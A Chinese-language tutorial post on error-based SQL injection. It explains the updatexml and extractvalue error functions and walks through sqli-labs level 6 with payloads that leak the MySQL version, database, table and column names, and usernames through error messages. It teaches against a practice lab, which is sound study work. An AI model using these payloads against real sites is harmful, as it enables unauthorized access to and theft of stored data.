一、SQL注入的类型
1、基于union的联合注入
2、报错注入
3、盲注注入
(1)布尔盲注
(2)基于时间的盲注
我们上一章写了基于union的联合注入,这次我们来看一下同样很简单的报错注入。
二、什么是报错注入
报错注入:通过一些函数错误的使用使其输出错误结果来获取信息。用于注入结果无回显但错误信息有输出的情况。返回的错误信息即是攻击者需要的信息。
三、报错注入常用函数
1、updatexml(1,2,3)
- xml文件名
- Xpath路径
- 更新内容
我们接下使用的函数就是updataxml(),利用第二个变量Xpath路径结合Concat()连接函数进行报错。
2、Extractvalue(1,2)
1. xml文档对象的名称
2.从xml文档对象中返回查询到的字符串值
3、floor()
这个比较复杂,有兴趣的小伙伴们可以学习然后教我哦
四、开始报错注入吧
1、判断输入是否有闭合符
2、判断闭合符
3、判断字段个数
4、判断当前库名和SQL版本
5、查询所有数据库库名
6、查询指定库的所有表
7、查询字段名
8、查询字段内容
1-3步和上一章所讲的基于union的联合注入一样所以不多赘述,我们接下来从第4步开始
1、判断输入是否有闭合符
2、判断闭合符
本章使用的例子是sqli-labs-php7-master靶场的第六关,这一关的闭合符是 "
3、判断字段个数
4、判断当前库名和SQL版本
和联合注入不一样的是,报错注入没有傻到直接输出信息,而是需要构造报错函数利用报错回显使信息输出 所以想要获得当前版本和库名就要构造报错函数。
payload:
id=1" and updatexml(1,concat("~",version()),3) --+ -- 查询的SQL版本
id=1" and updatexml(1,concat("~",database()),3) --+ -- 查询的当前库名
5、查询所有数据库库名
payload:
id=1" and updatexml(1,concat("~",(select group_concat(schema_name)
from information_schema.schemata limit n,1)),3) --+
limit(n,1) 这里的n是指第n-1行从limit(0,1)开始,一行一行查找。
6、查询指定库的所有表
payload:
id=1" and updatexml(1,concat("~",substr((select group_concat(table_name)
from information_schema.tables where table_schema='security'),1,30)),3)-- -
7、查询字段名
payload:
id=1" and updatexml(1,concat("~",substr((select group_concat(column_name)from
information_schema.columns where table_schema='security' and table_name='users'),1,30)),3)-- -
8、查询字段内容
payload:
id=1" and updatexml(1,concat("~",substr((select group_concat(username)
from security.users),1,30)),3) -- -